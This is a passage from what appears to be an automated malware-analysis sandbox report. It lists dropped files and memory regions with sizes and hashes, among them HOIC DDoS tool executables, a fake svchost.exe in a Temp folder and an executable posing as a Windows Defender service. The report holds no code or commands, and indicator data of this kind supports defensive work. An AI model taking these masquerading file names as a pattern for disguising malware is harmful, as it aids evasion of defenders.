9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e3161f4edbc9b963debe22e29658050b

SHA1
45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

SHA256
1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

SHA512
006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

SHA512
ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
634cde2589934e07d99490d6d6b9feca

SHA1
c118bd53a94e9ce0bd970b354812131675c1269f

SHA256
518e9613183fe36f877d1ae225c4e8e96c53349b09025e1c91533bb696a3f2d8

SHA512
972035cd12a6ec63b7a827867a54700d91855b45825bf57f15d5985d9380d77308e1638a8490403ad13a5ae307dfdd5a868bd9bfc6b37d4ecf00a8b54b9deae5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cae60f0ddddac635da71bba775a2c5b4

SHA1
386f1a036af61345a7d303d45f5230e2df817477

SHA256
b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

SHA512
28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4402048e9377e84bad040e1b0de62678

SHA1
627a02a24da9f1a16226209665309d4774a7ad31

SHA256
0c71a0e5ff5aa9668447be911686edde65a51498c3c8f4c064c100758b14c6c6

SHA512
252ad4d56224b6814fe49beb3d6e030f08b621156388dbbe4de5bc9b4069c7b20ae53ce4e2eb2b1e3227407e5d08efdb8f297f3fa62d7541b8315b5c6e442f76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3737c3eb5510d74c3d6ea770e9ff4ffb

SHA1
88148610a4f00560b06bc8607794d85f15bf3b64

SHA256
b716e0860cc27dd1035a125f44833c5999f4a0429635df6d97634f041b25effa

SHA512
db4db804933ab50bf56130a939040e33a57e4ec056c9e0c598bcae86bbaf093e2a22fd4ec8801f6b029985170f17859a931e63f28a7abb4f91780da2a33e1ebc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
029fbf628b046653ab7ff10b31deeeb2

SHA1
93c2cb1905c8f5e71f5ea97a1e8a8c891eae077c

SHA256
85f6b0971e94daf9fd4e39413824f162851a9f5ce7f989bd92c903a4dbcbef26

SHA512
d4e3626dba2572bd1e53446b384962f955cc0c7e56a72cacf50a845d74714ec1020bcb0fdcc50636a1dfd4f08dc34143dbb5638dd90180df6aa31dab9228c98c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a9293ef980c925abe33d940554ed8575

SHA1
9b6d85f2595f7fd4923f52b21ab7607279066969

SHA256
8313a191aa9d11cce868d95ac9a9b1609275bfe93131fcb6e547b985b0242fbe

SHA512
2003d90bb2bc89378ccaeb9c5edf76b2dfd93c80369d063e56141abb8d7fea6acee6a103874ab227bc1548437269c8e4ee5174bf482ecf3d66c38f3e0ba35d85

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe

Filesize
8.5MB

MD5
451c94a23536dcbba422d7612b34b6ff

SHA1
0b419c8b9f60cb9cb8957a6dbccb393b5d072e43

SHA256
3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0

SHA512
b777963ab9d21efa29528e6a126e616088205aff9e1b63453c731966dccf5f15cf30f17a933d40c98347a2d057b5f2cb40e40847f41476f0f212b28ce12e94de

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe

Filesize
4.4MB

MD5
a2b98f2c39c4ee63db62e17f1922543b

SHA1
74ec3e0bd346f66124e31a88342fdb7360795373

SHA256
4ffa5259e2480cedc72cb451274b99839415980f79cc8aa00c732e8e3422e900

SHA512
54cb755cd150d0dc49ec5023a2be3e1a851300c9d90fe7eb9beca1fecdaf17c31a5a85f4662c0600cc690292b98e078df4295c56d733ee40911bafaf580f13f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1aqu2o4y.znb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
63KB

MD5
4ba7faa19363c41304cbdc35aa60ba56

SHA1
afc806d82fae43d2427bd7b2deaf13c8473847da

SHA256
e88d123cf046a30859753771d3052b1290534acca5eaec94d8d0590b86d70178

SHA512
7a5fc420bac78206fe35766bd6c908879fc5e7ed88f87f2ff4ebee643a4e554ef6c94de69dec20e44024df7fc46b582dbc4744078e15d657c60f5999001ffda8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp783D.tmp.bat

Filesize
151B

MD5
10833e4346a211ff46fe5224e9f4f45a

SHA1
f11aa87f5f87687b55eb403d0c2f3d18a8e318a9

SHA256
0aa23ef617923f93655bf11b7b6e2821323a1794985f28f6e4497d0071c048c7

SHA512
a4b167a9dc0a82823d64a38c9c38c497e211063579de9e7234af21389a5d568a164bc7951b6228c5d8deafae6f7d46a03ed9ee15e1838d24fd30f52530744f08

Download Submit
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe

Filesize
900KB

MD5
3c5edd9bbe4c8fccc43b1849128d4fbc

SHA1
e046251308e1dc9b7722b1d32f8bc9593d7c1dc9

SHA256
64b38f64129aa45c3b5aa5bd87a682814adec425326603565c0c1d013fdb4cc1

SHA512
de3ce4e2f9e689bc7d8b06682f974502d63772e097aa76caa8f83ef961e168b10371f0c1f8e0645005c24162e7fcd7a69f31a4eabc9564d1a50df11ec092cc14

Download Submit
memory/860-362-0x0000029804F80000-0x0000029804F81000-memory.dmp

Filesize
4KB

Download
memory/3640-1-0x0000000000A50000-0x0000000001752000-memory.dmp

Filesize
13.0MB

Download
memory/3640-0-0x00007FFA87C23000-0x00007FFA87C25000-memory.dmp

Filesize
8KB

Download
memory/4516-49-0x00000215FECF0000-0x00000215FED12000-memory.dmp

Filesize
136KB

Download
memory/4528-367-0x00007FF734D00000-0x00007FF734DE7000-memory.dmp

Filesize
924KB

Download
memory/5116-50-0x0000000010000000-0x00000000100C8000-memory.dmp

Filesize
800KB

Download
memory/5116-54-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

Filesize
64KB

Download
memory/5116-62-0x0000000002F00000-0x0000000002F20000-memory.dmp

Filesize
128KB

Download
memory/5760-334-0x00007FF72B4E0000-0x00007FF72B950000-memory.dmp

Filesize
4.4MB

Download
memory/5764-109-0x00007FFA87C20000-0x00007FFA886E1000-memory.dmp

Filesize
10.8MB

Download
memory/5764-24-0x00007FFA87C20000-0x00007FFA886E1000-memory.dmp

Filesize
10.8MB

Download
memory/5764-23-0x0000000000750000-0x0000000000766000-memory.dmp

Filesize
88KB

Download